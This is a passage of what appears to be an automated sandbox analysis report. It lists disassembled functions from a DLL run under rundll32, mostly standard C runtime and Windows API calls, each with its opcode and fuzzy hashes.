                      • Part of subcall function 6FFFF0C0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF188
                      • Part of subcall function 6FFFF0C0: char_traits.LIBCPMTD ref: 6FFFF194
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF4BA
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF4CF
                    • char_traits.LIBCPMTD ref: 6FFFF4E1
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF52C
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF541
                    • char_traits.LIBCPMTD ref: 6FFFF553
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF566
                    • char_traits.LIBCPMTD ref: 6FFFF572
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Base::Concurrency::details::ContextIdentityQueueWork$char_traits
                    • String ID:
                    • API String ID: 1941806930-0
                    • Opcode ID: 0f016ba469a117847c5979690273d21c227afda46c1714b2a82e69eadf211ba4
                    • Instruction ID: 69c695e9435f3c5dfeb203d8bcc68b60fed77fa0f39ff9a332bc4254af64a895
                    • Opcode Fuzzy Hash: 0f016ba469a117847c5979690273d21c227afda46c1714b2a82e69eadf211ba4
                    • Instruction Fuzzy Hash: BB510D75A0110EEFCB04DF98D9D0D9E73B6AF88308F548658E9159B3A4DB30AF16DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000B5AC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 264COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • _memcmp.LIBVCRUNTIME ref: 7000B845
                    • _free.LIBCMT ref: 7000B8B9
                    • _free.LIBCMT ref: 7000B8D2
                    • _free.LIBCMT ref: 7000B910
                    • _free.LIBCMT ref: 7000B919
                    • _free.LIBCMT ref: 7000B925
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorLast$_memcmp
                    • String ID: C
                    • API String ID: 4275183328-1037565863
                    • Opcode ID: 1fd14246e37770a957d950b4cbe6281ae3dea5a62c8ba3575761535fe8edd5a0
                    • Instruction ID: 2ad2be3f93130312bdd8a729acb6c1c991dc571e711b98b1f773fc178a8faa1a
                    • Opcode Fuzzy Hash: 1fd14246e37770a957d950b4cbe6281ae3dea5a62c8ba3575761535fe8edd5a0
                    • Instruction Fuzzy Hash: 33B13C75A012199FEB25DF18C884B9DB7B5FF48724F1085AAE90AA7350DB71AE90CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFF6600 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5af925e0bb4255ed1d0cea57c4d73a074bf57a85f871645eae71e6705c25ac03
                    • Instruction ID: c52c509d80674c6e3c924945564b214af6c1e635c35590b3a05b1275ad833291
                    • Opcode Fuzzy Hash: 5af925e0bb4255ed1d0cea57c4d73a074bf57a85f871645eae71e6705c25ac03
                    • Instruction Fuzzy Hash: 5CC1D6B4D01209DFDB14CF98C990BAEBBB1FF49314F208269E419AB391DB35A946CF51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFF22F0 Relevance: 10.6, APIs: 7, Instructions: 76COMMON
                    Download Yara Rule
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6FFF231A
                    • int.LIBCPMTD ref: 6FFF2333
                      • Part of subcall function 6FFF5120: std::_Lockit::_Lockit.LIBCPMT ref: 6FFF5136
                      • Part of subcall function 6FFF5120: std::_Lockit::~_Lockit.LIBCPMT ref: 6FFF5160
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6FFF23CB
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                    • String ID:
                    • API String ID: 593203224-0
                    • Opcode ID: b7142ffed3046ac49ca1ab9a65a225dc485f7068299ecebea8bd712ae7f55b31
                    • Instruction ID: 8c83eacf671e5c6d7c5081f76e1f082217f26537f4fe45b922b6b7492d0d99c4
                    • Opcode Fuzzy Hash: b7142ffed3046ac49ca1ab9a65a225dc485f7068299ecebea8bd712ae7f55b31
                    • Instruction Fuzzy Hash: F7314BB1D0524ADFCB04DFA4C981AEEB7B5FF48720F104629E825B73A0DB356A01CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFF21F0 Relevance: 10.6, APIs: 7, Instructions: 76COMMON
                    Download Yara Rule
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6FFF221A
                    • int.LIBCPMTD ref: 6FFF2233
                      • Part of subcall function 6FFF5120: std::_Lockit::_Lockit.LIBCPMT ref: 6FFF5136
                      • Part of subcall function 6FFF5120: std::_Lockit::~_Lockit.LIBCPMT ref: 6FFF5160
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6FFF22CB
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                    • String ID:
                    • API String ID: 593203224-0
                    • Opcode ID: a0f5f5d9050b5342a8b420c6bedff8e8e3daeb78f75879064a4a32afb0882b47
                    • Instruction ID: 7302dbb918da0a733c11fa83775117b8244f691ae43c566701b697452c5f2d31
                    • Opcode Fuzzy Hash: a0f5f5d9050b5342a8b420c6bedff8e8e3daeb78f75879064a4a32afb0882b47
                    • Instruction Fuzzy Hash: BF315CB1D05249DFDB04DFA4C980BEEB7B0FF49720F104629E825A73A0DB716A01CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70011084 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 70010DD0: _free.LIBCMT ref: 70010DF5
                    • _free.LIBCMT ref: 700110D2
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                    • _free.LIBCMT ref: 700110DD
                    • _free.LIBCMT ref: 700110E8
                    • _free.LIBCMT ref: 7001113C
                    • _free.LIBCMT ref: 70011147
                    • _free.LIBCMT ref: 70011152
                    • _free.LIBCMT ref: 7001115D
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: db93a60c520cae334d79caf43acf8ce84a6796fdc350f4b236b0c628b9c7a178
                    • Instruction ID: 30abfd799bc072c3d797e465062370f173c556e0cc3cf4cf1ef16ba840afb9c1
                    • Opcode Fuzzy Hash: db93a60c520cae334d79caf43acf8ce84a6796fdc350f4b236b0c628b9c7a178
                    • Instruction Fuzzy Hash: 82112C71940B04AEE530ABF0DC0AFDF7B9CBF40B60F404815B29DA6092DBA9B5448752
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70005FEA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,70005ED4,700019C5,700015F1), ref: 70005FF8
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 70006006
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7000601F
                    • SetLastError.KERNEL32(00000000,?,70005ED4,700019C5,700015F1), ref: 70006071
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 4bb942f0e4f706afa6a167da4a01b7911a6bdcf1456eb8d522460cc55fd52a5d
                    • Instruction ID: d9ce064682aae80c8d8687f109e83c2726cad6850be2c3023e4d13325c692f2b
                    • Opcode Fuzzy Hash: 4bb942f0e4f706afa6a167da4a01b7911a6bdcf1456eb8d522460cc55fd52a5d
                    • Instruction Fuzzy Hash: 0801D43B7892126EF326677AAC8962F3AABEF02E787304229F519414F0EF116C409154
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 700138C5 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 7001390D
                    • __fassign.LIBCMT ref: 70013AEC
                    • __fassign.LIBCMT ref: 70013B09
                    • WriteFile.KERNEL32(?,7000FF5E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 70013B51
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 70013B91
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 70013C3D
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: 34b49f3e9250847c51f5328c8971d952cfb5e9f1487204c6efe049c795159145
                    • Instruction ID: 29693fd353e1a6a5e3fef727561aa1d161c5bbaba3a35f73ad94fd0d42c7fe87
                    • Opcode Fuzzy Hash: 34b49f3e9250847c51f5328c8971d952cfb5e9f1487204c6efe049c795159145
                    • Instruction Fuzzy Hash: F2D1BD71D042599FDF15CFA8C9809EDBBB5BF49720F24016DE856BB242E730AD86CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000ECB2 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free_strpbrk
                    • String ID: *?
                    • API String ID: 3300345361-2564092906
                    • Opcode ID: e1a1aa32129ba429b7c700d8d5b6ac68a903fb23adde7ba9c70e32a411e22ede
                    • Instruction ID: fd464556ac28505ddd56616ac2565a2a93ed8cc5e0dd226586c6280715aaa50e
                    • Opcode Fuzzy Hash: e1a1aa32129ba429b7c700d8d5b6ac68a903fb23adde7ba9c70e32a411e22ede
                    • Instruction Fuzzy Hash: C2615DB5E0025D9FEB15CFA8C8815EDFBF6EF48624B25816AE845F7300D735AE418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000F2D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                    Download Yara Rule
                    Strings
                    • C:\Windows\SysWOW64\rundll32.exe, xrefs: 7000F2D5
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                    • API String ID: 0-2837366778
                    • Opcode ID: f28fa3252abee74e7171f4a8ec98e77d48e4efede06f78b84f58b554be6ebc6a
                    • Instruction ID: 0f9b5780119d247b4562d02999d90aa095166b58f6ecd995f8f15535d4361e28
                    • Opcode Fuzzy Hash: f28fa3252abee74e7171f4a8ec98e77d48e4efede06f78b84f58b554be6ebc6a
                    • Instruction Fuzzy Hash: D321FFB1608209BFF7119FA18CC0D6F77AEAF40A787118525F919D7941EB70EE00A7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000B121 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    • Opcode ID: 9dda47f9c9e10c0aadbecf73c3a40d66fa64f023f09dc5ae81a328d2951244d1
                    • Instruction ID: 28ee166964a5fee82ce145c2b75944edfb088f1cf2efe276690ebfa966d1a6f6
                    • Opcode Fuzzy Hash: 9dda47f9c9e10c0aadbecf73c3a40d66fa64f023f09dc5ae81a328d2951244d1
                    • Instruction Fuzzy Hash: 4A518132A00605AFEB22DF69CD41BAE77F6EF58B34F10456DE90AD7250E735EA018B40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70008863 Relevance: 7.6, APIs: 5, Instructions: 119COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 700088D1
                    • _free.LIBCMT ref: 700088F1
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 70008952
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 70008964
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 70008971
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: __crt_fast_encode_pointer$_free
                    • String ID:
                    • API String ID: 366466260-0
                    • Opcode ID: d8c5f098d6cb52b236ca23f3d871a3460e5d67e08ab579634feb3412fa54b214
                    • Instruction ID: 73dcf99f964ae74769b98e803fbb23b146fbe8836e721e506cd9c0c5081e6d66
                    • Opcode Fuzzy Hash: d8c5f098d6cb52b236ca23f3d871a3460e5d67e08ab579634feb3412fa54b214
                    • Instruction Fuzzy Hash: A9418436A00204DFEB10DF68C985A6DB7F6FF85B24F154468E556EB341DB31AD01CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70010B58 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 70010B70
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                    • _free.LIBCMT ref: 70010B82
                    • _free.LIBCMT ref: 70010B94
                    • _free.LIBCMT ref: 70010BA6
                    • _free.LIBCMT ref: 70010BB8
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 0cb8cd099462d7b6c1b8fee6f074320a94f6b6c94f290930cef78268dd0cba87
                    • Instruction ID: c9226472c91ab0dfcc547379362f362a8f92cef939cf50168b49be3d4110f2bc
                    • Opcode Fuzzy Hash: 0cb8cd099462d7b6c1b8fee6f074320a94f6b6c94f290930cef78268dd0cba87
                    • Instruction Fuzzy Hash: 36F0FF329082019FE624DB69E9C9D2E77EABB11B347714849F48ED7661C774FCC04654
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000068F Relevance: 6.1, APIs: 4, Instructions: 136COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __Getcvt.LIBCPMT ref: 700006E7
                    • MultiByteToWideChar.KERNEL32(6FFF97EB,00000009,?,00000002,?,00000000), ref: 70000735
                    • MultiByteToWideChar.KERNEL32(6FFF97EB,00000009,00000001,BA0B7DC0,?,00000000), ref: 700007A7
                    • MultiByteToWideChar.KERNEL32(6FFF97EB,00000009,00000001,00000001,?,00000000), ref: 700007CF
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$Getcvt
                    • String ID:
                    • API String ID: 3195005509-0
                    • Opcode ID: 12cda25913675546b9d614e34dd0205d3d978e2a4efc1320c32fc511a927f808
                    • Instruction ID: bcd5115b45d1748fdcf4711da263425cd6ecd0962538c57b3bdf44a2f9d1c856
                    • Opcode Fuzzy Hash: 12cda25913675546b9d614e34dd0205d3d978e2a4efc1320c32fc511a927f808
                    • Instruction Fuzzy Hash: 3B41CD31A04705AFFB228F64C841BAE77FABF41B20F108469E85ADB290D775AC50CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000EBE3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 7000F1E8: _free.LIBCMT ref: 7000F1F6
                      • Part of subcall function 7000E90B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,7000A5B5,?,00000000,00000000), ref: 7000E9AD
                    • GetLastError.KERNEL32 ref: 7000EC4B
                    • __dosmaperr.LIBCMT ref: 7000EC52
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 7000EC91
                    • __dosmaperr.LIBCMT ref: 7000EC98
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: f59c7f159cfe6e932075cb7c9c9b3653801b3ca40f59074c85e04867930237c7
                    • Instruction ID: 7a52d576f1b351cb823aa9a9395132ebc6a64d3726c4770afcce4126e0fecd6f
                    • Opcode Fuzzy Hash: f59c7f159cfe6e932075cb7c9c9b3653801b3ca40f59074c85e04867930237c7
                    • Instruction Fuzzy Hash: D72100B160025DAFF7119F668C84C5FB7AFEF40A7C3108529F92AA3140D732EC428BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70009B0D Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e338d556745fcade16cf5f1cb61d5dc75fb2ee4ef1aed5cf014f8907073d8913
                    • Instruction ID: da77f3fd2439d73c09a2a971ee27d7d0ec7e7bcf84796360600d2f6e31803f35
                    • Opcode Fuzzy Hash: e338d556745fcade16cf5f1cb61d5dc75fb2ee4ef1aed5cf014f8907073d8913
                    • Instruction Fuzzy Hash: D821A872A15211AFF7228B65AE85B5E37B9AF41E74F210514EE46A7290DB70DD00C5D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 700096C6 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                    • _free.LIBCMT ref: 70009728
                    • _free.LIBCMT ref: 7000975E
                    • SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID:
                    • API String ID: 2283115069-0
                    • Opcode ID: 24f29785bfc40782f741f167f49ce870498d525460cf526eda401a703f68ef6e
                    • Instruction ID: 522f914bcadbd7a877f3e0d772b609fb8b4bd3d1076ca93fbc9b6b7be67b83c9
                    • Opcode Fuzzy Hash: 24f29785bfc40782f741f167f49ce870498d525460cf526eda401a703f68ef6e
                    • Instruction Fuzzy Hash: 8F1125332495012FF3029B7A4D89E2F31AE9BC2E71B700228F62D921E2EF229C01D210
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000981D Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,00000000,?,7000685A,00000000,?,700068D2,00000000,00000000,00000000,00000000,00000000,?,6FFF87EC,6FFFC83A,6FFFC83A), ref: 70009822
                    • _free.LIBCMT ref: 7000987F
                    • _free.LIBCMT ref: 700098B5
                    • SetLastError.KERNEL32(00000000,700471A0,000000FF,?,00000000,?,7000685A,00000000,?,700068D2,00000000,00000000,00000000,00000000,00000000), ref: 700098C0
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID:
                    • API String ID: 2283115069-0
                    • Opcode ID: e6b9b7802d6a36c77ca3a7c507f91109beed7485d429741d8669ad84c6f30563
                    • Instruction ID: ce0ab5bc4adfbfbe6fc0919b6e444d351bce5a07d02a91592ba30ae76d1f7e18
                    • Opcode Fuzzy Hash: e6b9b7802d6a36c77ca3a7c507f91109beed7485d429741d8669ad84c6f30563
                    • Instruction Fuzzy Hash: 301108732451012EF312577A4C89E2E35ABAFC3E75B714239F62D923E1EF219C018320
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFF6A80 Relevance: 6.1, APIs: 4, Instructions: 59COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::cancel_current_task.LIBCPMT ref: 6FFF6AA8
                    • Concurrency::cancel_current_task.LIBCPMT ref: 6FFF6AD9
                    • new.LIBCMT ref: 6FFF6AE2
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_task
                    • String ID:
                    • API String ID: 118556049-0
                    • Opcode ID: 312d7f25794107d97d3e2d614be0cf6505e1752365e19374d28b4cbe0ecaffe2
                    • Instruction ID: b2c9e28e178e2fb5f67c95ee784d2ad47860813f3c5023f1ef4362302503d1b4
                    • Opcode Fuzzy Hash: 312d7f25794107d97d3e2d614be0cf6505e1752365e19374d28b4cbe0ecaffe2
                    • Instruction Fuzzy Hash: 87214DB0E02108EFDB04DFA8C48179DB7B1EF45314F10C699F415AB251DB74AA86CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000519E Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 700051B5
                      • Part of subcall function 700057ED: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 7000581C
                      • Part of subcall function 700057ED: ___AdjustPointer.LIBCMT ref: 70005837
                    • _UnwindNestedFrames.LIBCMT ref: 700051CC
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 700051DE
                    • CallCatchBlock.LIBVCRUNTIME ref: 70005202
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                    • String ID:
                    • API String ID: 2901542994-0
                    • Opcode ID: 9acedb74078e681ed15b5af2be0e17530da3e82682995608ea3d5cfcacaaeb63
                    • Instruction ID: 1faa625efa20b6f6591a1f666628ebf8baffacccd684976c123a9f4677bc2682
                    • Opcode Fuzzy Hash: 9acedb74078e681ed15b5af2be0e17530da3e82682995608ea3d5cfcacaaeb63
                    • Instruction Fuzzy Hash: 4C011332000109AFEF129F55CC02EDF3FBAEF48B65F118018F91862121D372E8A1EBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70015256 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • WriteConsoleW.KERNEL32(?,?,7000FFCF,00000000,?,?,70014C41,?,00000001,?,00000001,?,70013C9A,00000000,00000000,00000001), ref: 7001526D
                    • GetLastError.KERNEL32(?,70014C41,?,00000001,?,00000001,?,70013C9A,00000000,00000000,00000001,00000000,00000001,?,700141EE,7000FF5E), ref: 70015279
                      • Part of subcall function 7001523F: CloseHandle.KERNEL32(700479D0,70015289,?,70014C41,?,00000001,?,00000001,?,70013C9A,00000000,00000000,00000001,00000000,00000001), ref: 7001524F
                    • ___initconout.LIBCMT ref: 70015289
                      • Part of subcall function 70015201: CreateFileW.KERNEL32(70043090,40000000,00000003,00000000,00000003,00000000,00000000,70015230,70014C2E,00000001,?,70013C9A,00000000,00000000,00000001,00000000), ref: 70015214
                    • WriteConsoleW.KERNEL32(?,?,7000FFCF,00000000,?,70014C41,?,00000001,?,00000001,?,70013C9A,00000000,00000000,00000001,00000000), ref: 7001529E
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: d37817f9323e742a8a4eeca5c404718a87940582ee7ba96ddd822662fefcd3f0
                    • Instruction ID: 2fa11b5f7b82c1b1b890b7a0d82407d593bd18f5e7f3a4c6bf47a6af3eeae8f2
                    • Opcode Fuzzy Hash: d37817f9323e742a8a4eeca5c404718a87940582ee7ba96ddd822662fefcd3f0
                    • Instruction Fuzzy Hash: D4F09837541215BFDB225F9A9C08E8D3E66FB4A6B1B254410FA2D9A520C7329C609B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70005EA6 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 70005EA6
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 70005EAB
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 70005EB0
                      • Part of subcall function 7000629E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 700062AF
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 70005EC5
